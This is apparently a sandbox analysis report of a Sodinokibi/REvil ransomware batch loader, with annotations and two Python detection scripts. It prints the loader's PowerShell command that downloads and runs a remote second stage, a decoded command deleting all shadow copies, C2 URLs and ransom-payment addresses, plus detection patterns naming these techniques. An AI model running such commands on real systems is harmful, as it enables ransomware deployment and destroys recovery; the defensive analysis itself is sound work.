Analysis
max time kernel: 134s
max time network: 142s
platform: windows7_x64
resource: win7v200430
submitted: 05-05-2020 19:10
Static task: static1
Behavioral task behavioral1: Sample Sm5WHtYm.bat, Resource win7v200430
Behavioral task behavioral2: Sample Sm5WHtYm.bat, Resource win10v200430
(The signatures and process tree on this page are from the windows7_x64 run; the win10v200430 task is listed but not reported here.)
General
Target: Sm5WHtYm.bat
Size: 193B
MD5: 89479f503f8853ef6d980710e78294c3
SHA1: 816b60d4a2d1038ad57182c3356639a7f595e519
SHA256: 94da60b220dfc957c34baa5386d0758c38afb21752e7bc55bf7a0ee19bd752b1
SHA512: ae9a1fb7b5f6e95e07cf2515e55dd6d4d98ae2b40af5995c645bf9c808b8326894ed1f98ebd678594f3ea259af28dffabf29419573e7923a9984a55ea419d61d
Malware Config
Extracted (stage-two URL, from the loader command line in the process tree)
http://185.103.242.78/pastes/Sm5WHtYm
Extracted (ransom note)
C:\8372l6bpv-readme.txt
Family: sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/15CF157DDDA55355
http://decryptor.cc/15CF157DDDA55355
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes: powershell.exe (PID 748)

Suspicious use of WriteProcessMemory 5 IoCs
Processes: cmd.exe, powershell.exe
PID 676 (cmd.exe) wrote to memory of PID 748 (powershell.exe)
PID 748 (powershell.exe) wrote to memory of PID 1556 (powershell.exe), 4 entries

Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes: powershell.exe, powershell.exe, vssvc.exe
Token: SeDebugPrivilege, PID 748 powershell.exe (2 entries)
Token: SeTakeOwnershipPrivilege, PID 748 powershell.exe
Token: SeDebugPrivilege, PID 1556 powershell.exe
Token: SeBackupPrivilege, PID 2008 vssvc.exe
Token: SeRestorePrivilege, PID 2008 vssvc.exe
Token: SeAuditPrivilege, PID 2008 vssvc.exe

Drops file in System32 directory 1 IoCs
Processes: powershell.exe
File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe
dberr.txt is the Cryptographic Services catalog database log; this write accompanies the root certificate update recorded in the next signature rather than a payload drop.

Modifies system certificate store 8 IoCs
Processes: powershell.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = <blob data elided> powershell.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 powershell.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = <blob data elided> powershell.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 powershell.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = <blob data elided> powershell.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C powershell.exe
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = <blob data elided> powershell.exe
The four thumbprints are public root CAs (DAC9024F: DST Root CA X3; A8985D3A: DigiCert Global Root CA; 5FB7EE06: DigiCert High Assurance EV Root CA; B1BC968B: GlobalSign Root CA) pulled into AuthRoot by the Windows automatic root update when the PowerShell host opened its first HTTPS connections; the apps.identrust.com and download.windowsupdate.com requests under "Makes http(s) request" are that update. The signature is a side effect of the TLS beaconing, not the ransomware tampering with the trust store.
Makes http(s) request 36 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes: powershell.exe (PID 748)
flow 4    http://185.103.242.78/pastes/Sm5WHtYm
flow 6    https://bloggyboulga.net/content/images/lhnnljurbg.jpg
flow 16   https://pmc-services.de/include/temp/vdbonbwn.jpg
flow 18   http://apps.identrust.com/roots/dstrootcax3.p7c
flow 20   http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
flow 22   https://www.pmc-services.de/include/temp/vdbonbwn.jpg
flow 24   https://completeweddingkansas.com/data/pics/azwxcmysazbn.gif
flow 26   https://completewedo.com/kansas/data/pics/azwxcmysazbn.gif
flow 31   https://facettenreich27.de/wp-content/image/qxqdpxasbcvnlp.gif
flow 33   https://waynela.com/include/assets/enbtkimrwq.png
flow 35   https://www.waynela.com/include/assets/enbtkimrwq.png
flow 39   https://makeurvoiceheard.com/news/images/ucqygr.png
flow 41   https://antonmack.de/uploads/graphic/vwtxlxhi.png
flow 45   https://zimmerei-deboer.de/wp-content/pics/euinkulupn.gif
flow 50   https://x-ray.ca/news/temp/koetdb.jpg
flow 51   https://x-ray.ca/
flow 56   https://vibethink.net/data/tmp/cqjz.jpg
flow 57   https://vibethink.net/
flow 61   https://noesis.tech/admin/game/btdbtacgfagedwqc.gif
flow 63   https://icpcnj.org/static/images/tcvfehqmswqqok.png
flow 65   https://nachhilfe-unterricht.com/content/tmp/hy.gif
flow 68   https://esope-formation.fr/news/temp/knoxfffk.jpg
flow 70   https://plastidip.com.ar/include/pics/pujxemelmidqax.gif
flow 73   https://zieglerbrothers.de/data/pics/ehcmmpww.gif
flow 75   https://www.zieglerbrothers.de/data/pics/ehcmmpww.gif
flow 83   https://schoolofpassivewealth.com/data/temp/sh.png
flow 85   https://huissier-creteil.com/static/pictures/zc.png
flow 90   https://huesges-gruppe.de/include/temp/atrl.png
flow 92   https://www.huesges-gruppe.de/include/temp/atrl.png
flow 94   https://ilive.lt/admin/image/huxzcz.png
flow 96   https://restaurantesszimmer.de/news/temp/wqmangyjmamw.jpg
flow 100  https://polzine.net/data/images/ylurpd.jpg
flow 102  https://southeasternacademyofprosthodontics.org/uploads/game/iwojls.gif
flow 104  https://thomas-hospital.de/news/tmp/lcisybxg.png
flow 106  https://www.thomas-hospital.de/news/tmp/lcisybxg.png
flow 126  https://hexcreatives.co/admin/images/jwdyvbqp.gif
Reading the list: flow 4 is the stage-two download named in the .bat; flows 18 and 20 are the Windows automatic root certificate update triggered by the first HTTPS connections (they also account for the "Modifies system certificate store" entries above). The remaining requests share one shape: an ordinary-looking third-party domain, a generic directory (images, pics, tmp, temp, assets, game), and a random lowercase filename with an image extension, with several domains tried both with and without a www. prefix. That fan-out across unrelated hosts from a single PowerShell process is the behaviour worth alerting on; the individual domains are not a stable indicator.
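The fan-out pattern described above, as an added example that is not part of the original report or the sandbox vendor's tooling. It embeds the 36 URLs from this run (copied from the list, nothing is fetched), classifies each one by the generic-directory/random-image path shape, counts distinct hosts after folding www/non-www pairs, and separates out the two root-update requests. The directory set and the five-host alert threshold are assumptions drawn from this run's data, not from the family's configuration.

```python
import re
from urllib.parse import urlsplit

# The 36 URLs under "Makes http(s) request" above, in flow order, copied from
# the report; this example fetches nothing.
OBSERVED_URLS = [
    "http://185.103.242.78/pastes/Sm5WHtYm",
    "https://bloggyboulga.net/content/images/lhnnljurbg.jpg",
    "https://pmc-services.de/include/temp/vdbonbwn.jpg",
    "http://apps.identrust.com/roots/dstrootcax3.p7c",
    "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
    "https://www.pmc-services.de/include/temp/vdbonbwn.jpg",
    "https://completeweddingkansas.com/data/pics/azwxcmysazbn.gif",
    "https://completewedo.com/kansas/data/pics/azwxcmysazbn.gif",
    "https://facettenreich27.de/wp-content/image/qxqdpxasbcvnlp.gif",
    "https://waynela.com/include/assets/enbtkimrwq.png",
    "https://www.waynela.com/include/assets/enbtkimrwq.png",
    "https://makeurvoiceheard.com/news/images/ucqygr.png",
    "https://antonmack.de/uploads/graphic/vwtxlxhi.png",
    "https://zimmerei-deboer.de/wp-content/pics/euinkulupn.gif",
    "https://x-ray.ca/news/temp/koetdb.jpg",
    "https://x-ray.ca/",
    "https://vibethink.net/data/tmp/cqjz.jpg",
    "https://vibethink.net/",
    "https://noesis.tech/admin/game/btdbtacgfagedwqc.gif",
    "https://icpcnj.org/static/images/tcvfehqmswqqok.png",
    "https://nachhilfe-unterricht.com/content/tmp/hy.gif",
    "https://esope-formation.fr/news/temp/knoxfffk.jpg",
    "https://plastidip.com.ar/include/pics/pujxemelmidqax.gif",
    "https://zieglerbrothers.de/data/pics/ehcmmpww.gif",
    "https://www.zieglerbrothers.de/data/pics/ehcmmpww.gif",
    "https://schoolofpassivewealth.com/data/temp/sh.png",
    "https://huissier-creteil.com/static/pictures/zc.png",
    "https://huesges-gruppe.de/include/temp/atrl.png",
    "https://www.huesges-gruppe.de/include/temp/atrl.png",
    "https://ilive.lt/admin/image/huxzcz.png",
    "https://restaurantesszimmer.de/news/temp/wqmangyjmamw.jpg",
    "https://polzine.net/data/images/ylurpd.jpg",
    "https://southeasternacademyofprosthodontics.org/uploads/game/iwojls.gif",
    "https://thomas-hospital.de/news/tmp/lcisybxg.png",
    "https://www.thomas-hospital.de/news/tmp/lcisybxg.png",
    "https://hexcreatives.co/admin/images/jwdyvbqp.gif",
]

# Path shape shared by the non-Microsoft requests in this run: a generic
# directory followed by a random lowercase filename with an image extension.
# The directory set is taken from this run's list (assumption: other runs
# may use further names).
GENERIC_DIRS = {"images", "image", "pics", "pictures", "assets", "graphic",
                "tmp", "temp", "game"}
RANDOM_IMAGE_NAME = re.compile(r"^[a-z]{1,20}\.(?:png|jpg|gif)$")

# Hosts contacted by the Windows automatic root certificate update, not by
# the payload.
TRUST_UPDATE_HOSTS = {"apps.identrust.com", "www.download.windowsupdate.com"}


def registrable_host(url):
    """Hostname with a leading 'www.' removed, so www/non-www pairs count once."""
    host = (urlsplit(url).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host


def looks_like_beacon(url):
    """True when the URL path ends in <generic dir>/<random lowercase name>.<img>."""
    segments = urlsplit(url).path.strip("/").split("/")
    if len(segments) < 2:
        return False  # root pages and single-segment paths never match
    parent, name = segments[-2], segments[-1]
    return parent.lower() in GENERIC_DIRS and RANDOM_IMAGE_NAME.match(name) is not None


def summarize(urls):
    """Split a process's URL list into beacon-shaped, trust-update and other."""
    beacons = [u for u in urls if looks_like_beacon(u)]
    trust = [u for u in urls
             if (urlsplit(u).hostname or "").lower() in TRUST_UPDATE_HOSTS]
    hosts = sorted({registrable_host(u) for u in beacons})
    return {
        "total": len(urls),
        "beacon_like": len(beacons),
        "distinct_beacon_hosts": len(hosts),
        "beacon_hosts": hosts,
        "trust_update": len(trust),
        "unclassified": [u for u in urls if u not in beacons and u not in trust],
    }


def fan_out_alert(urls, min_hosts=5):
    """Alert when one process hits beacon-shaped paths on at least min_hosts
    unrelated hosts. The threshold is an assumption; tune it to your traffic."""
    return summarize(urls)["distinct_beacon_hosts"] >= min_hosts


if __name__ == "__main__":
    report = summarize(OBSERVED_URLS)
    print(f'{report["beacon_like"]} beacon-shaped requests across '
          f'{report["distinct_beacon_hosts"]} hosts; alert={fan_out_alert(OBSERVED_URLS)}')
```

Run against this list the classifier leaves exactly three URLs unclassified (the paste download and the two bare root pages), which is the residue an analyst would then look at by hand; the www-folding matters because five domains appear twice and would otherwise inflate the host count.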
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes: powershell.exe (PID 748, 3 entries), powershell.exe (PID 1556, 2 entries)

Blacklisted process makes network request 66 IoCs
Processes: powershell.exe (PID 748)
Flows: 4, 6, 8, 10, 11, 13, 14, 16, 18, 20, 22, 24, 26, 28, 29, 31, 33, 35, 37, 39, 41, 43, 45, 47, 48, 50, 51, 53, 54, 56, 57, 59, 61, 63, 65, 68, 70, 73, 75, 79, 80, 83, 85, 87, 88, 90, 92, 94, 96, 98, 100, 102, 104, 106, 108, 109, 111, 112, 114, 116, 118, 119, 121, 122
Enumerates connected drives 3 TTPs

Modifies service 2 TTPs 4 IoCs
Processes: vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe
These VSS\Diag writer keys are written by the Volume Shadow Copy service itself as it starts up to serve the shadow copy deletion issued by PID 1556 (see the process tree). They are the trace of that deletion, not a persistence mechanism.
Drops file in Program Files directory 28 IoCs
Processes: powershell.exe
Ransom notes created (5):
File created \??\c:\program files\8372l6bpv-readme.txt powershell.exe
File created \??\c:\program files (x86)\8372l6bpv-readme.txt powershell.exe
File created \??\c:\program files\microsoft sql server compact edition\8372l6bpv-readme.txt powershell.exe
File created \??\c:\program files\microsoft sql server compact edition\v3.5\8372l6bpv-readme.txt powershell.exe
File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\8372l6bpv-readme.txt powershell.exe
Sandbox decoy documents opened for modification (23):
File opened for modification \??\c:\program files\EnableStep.wmv powershell.exe
File opened for modification \??\c:\program files\RequestHide.xhtml powershell.exe
File opened for modification \??\c:\program files\ResetUse.odt powershell.exe
File opened for modification \??\c:\program files\SelectReceive.jtx powershell.exe
File opened for modification \??\c:\program files\SubmitDeny.ps1xml powershell.exe
File opened for modification \??\c:\program files\UseAssert.xlt powershell.exe
File opened for modification \??\c:\program files\AddStep.vstx powershell.exe
File opened for modification \??\c:\program files\DisableSplit.docm powershell.exe
File opened for modification \??\c:\program files\RepairStep.dwfx powershell.exe
File opened for modification \??\c:\program files\ResetSet.zip powershell.exe
File opened for modification \??\c:\program files\AddUse.xla powershell.exe
File opened for modification \??\c:\program files\EnterLimit.mhtml powershell.exe
File opened for modification \??\c:\program files\ResetSend.gif powershell.exe
File opened for modification \??\c:\program files\ShowUnprotect.mov powershell.exe
File opened for modification \??\c:\program files\StepMerge.nfo powershell.exe
File opened for modification \??\c:\program files\UnregisterWrite.js powershell.exe
File opened for modification \??\c:\program files\UpdateSearch.MTS powershell.exe
File opened for modification \??\c:\program files\BackupCopy.easmx powershell.exe
File opened for modification \??\c:\program files\CompareInstall.jpg powershell.exe
File opened for modification \??\c:\program files\CompleteSelect.mp4 powershell.exe
File opened for modification \??\c:\program files\SkipEnable.pptm powershell.exe
File opened for modification \??\c:\program files\TestOut.vsx powershell.exe
File opened for modification \??\c:\program files\AssertRedo.dxf powershell.exe
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes: powershell.exe
Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ea5q.bmp" powershell.exe
Processes
C:\Windows\system32\cmd.exe (PID 676)
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Sm5WHtYm.bat"
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 748, child of 676)
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Sm5WHtYm');Invoke-OVWRKZKGCK;Start-Sleep -s 10000"
        - Suspicious behavior: CmdExeWriteProcessMemorySpam
        - Suspicious use of WriteProcessMemory
        - Suspicious use of AdjustPrivilegeToken
        - Drops file in System32 directory
        - Modifies system certificate store
        - Suspicious behavior: EnumeratesProcesses
        - Blacklisted process makes network request
        - Drops file in Program Files directory
        - Sets desktop wallpaper using registry
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1556, child of 748)
            powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
            The -e argument is base64 over UTF-16LE text and decodes to:
            Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\vssvc.exe (PID 2008)
    C:\Windows\system32\vssvc.exe
    - Suspicious use of AdjustPrivilegeToken
    - Modifies service
Reading the tree: the 193-byte .bat is a one-line loader. It starts the 32-bit (SysWOW64) PowerShell host, which fetches the second stage from the paste URL, evaluates it in memory with IEX, calls the entry function Invoke-OVWRKZKGCK that the script defines, and then sleeps for 10000 seconds so the host process stays alive after the entry function returns. The in-memory payload spawns a second, encoded PowerShell to delete every volume shadow copy through WMI; that request is what starts vssvc.exe (SeBackupPrivilege/SeRestorePrivilege, the VSS\Diag writer keys) and is the last point at which file recovery is cheap. The ransom notes in Program Files and the wallpaper change follow from PID 748.
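The detection points in the tree above, as an added example that is not part of the original report or the sandbox vendor's tooling. It rebuilds the four process records from the page's own PIDs, parent links, image paths and command lines (the dict layout is this example's, not a sandbox export format), decodes the -EncodedCommand argument the way PowerShell does (any unambiguous prefix of the switch, base64 over UTF-16LE), and runs a few rules over each effective command line: an IEX download cradle, shadow copy deletion (the WMI form seen here plus the vssadmin and wmic variants, which are assumed common equivalents rather than something this run shows), a very long Start-Sleep, and a PowerShell parent launching an encoded PowerShell child. Rule names and thresholds are this example's assumptions.

```python
import base64
import re

# Process-creation records rebuilt from the sandbox process tree on this page.
# PIDs, parent links, image paths and command lines are the report's own data;
# the dict layout is this example's, not any sandbox export format.
PROCESS_EVENTS = [
    {"pid": 676, "ppid": None, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\Admin\AppData\Local\Temp\Sm5WHtYm.bat"'},
    {"pid": 748, "ppid": 676,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "
                "\"IEX (New-Object System.Net.WebClient).DownloadString("
                "'http://185.103.242.78/pastes/Sm5WHtYm');Invoke-OVWRKZKGCK;"
                "Start-Sleep -s 10000\""},
    {"pid": 1556, "ppid": 748,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="},
    {"pid": 2008, "ppid": None, "image": r"C:\Windows\system32\vssvc.exe",
     "cmdline": r"C:\Windows\system32\vssvc.exe"},
]

# -EncodedCommand may be abbreviated to any unambiguous prefix (-e, -ec, -enc, ...)
# and PowerShell also accepts a forward slash in place of the dash.
ENCODED_FLAG = re.compile(r"(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Each rule fires only when every pattern in its list matches the effective
# command text (raw command line plus the decoded payload, if any).
RULES = [
    ("download_cradle", [r"\b(?:IEX|Invoke-Expression)\b",
                         r"\.Download(?:String|File|Data)\(|Invoke-WebRequest|\biwr\b"]),
    # WMI form is the one on this page; vssadmin/wmic are assumed common variants.
    ("shadow_copy_deletion", [r"Win32_Shadowcopy.*\.Delete\("
                              r"|vssadmin(?:\.exe)?\s+delete\s+shadows"
                              r"|wmic(?:\.exe)?\s+shadowcopy\s+delete"]),
    # Four or more digits of seconds: keeps the host alive long after the payload ran.
    ("long_sleep", [r"Start-Sleep\s+-s(?:econds)?\s+\d{4,}"]),
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 over UTF-16LE), or None."""
    for flag, blob in ENCODED_FLAG.findall(cmdline):
        if not "encodedcommand".startswith(flag.lower()):
            continue  # -ep / -ExecutionPolicy and friends are not encoded commands
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None  # looked like the switch but the payload is not valid
    return None


def is_powershell(image):
    return image.lower().endswith("\\powershell.exe")


def analyze(events):
    """Map pid -> sorted rule names for every process that trips at least one rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for e in events:
        hits = set()
        decoded = decode_encoded_command(e["cmdline"])
        text = e["cmdline"] if decoded is None else e["cmdline"] + "\n" + decoded
        if decoded is not None:
            hits.add("encoded_command")
        for name, patterns in RULES:
            if all(re.search(p, text, re.IGNORECASE | re.DOTALL) for p in patterns):
                hits.add(name)
        parent = by_pid.get(e["ppid"])
        if (parent is not None and decoded is not None
                and is_powershell(parent["image"]) and is_powershell(e["image"])):
            hits.add("powershell_spawns_encoded_powershell")
        if hits:
            findings[e["pid"]] = sorted(hits)
    return findings


if __name__ == "__main__":
    for pid, names in analyze(PROCESS_EVENTS).items():
        print(pid, ", ".join(names))
```

Decoding before matching is the point: the shadow copy rule never sees the string "Win32_Shadowcopy" in the raw command line of PID 1556, only in its decoded payload, and the parent/child rule turns two individually weak signals (PowerShell parent, encoded child) into one that is rare outside of malware and some deployment tooling.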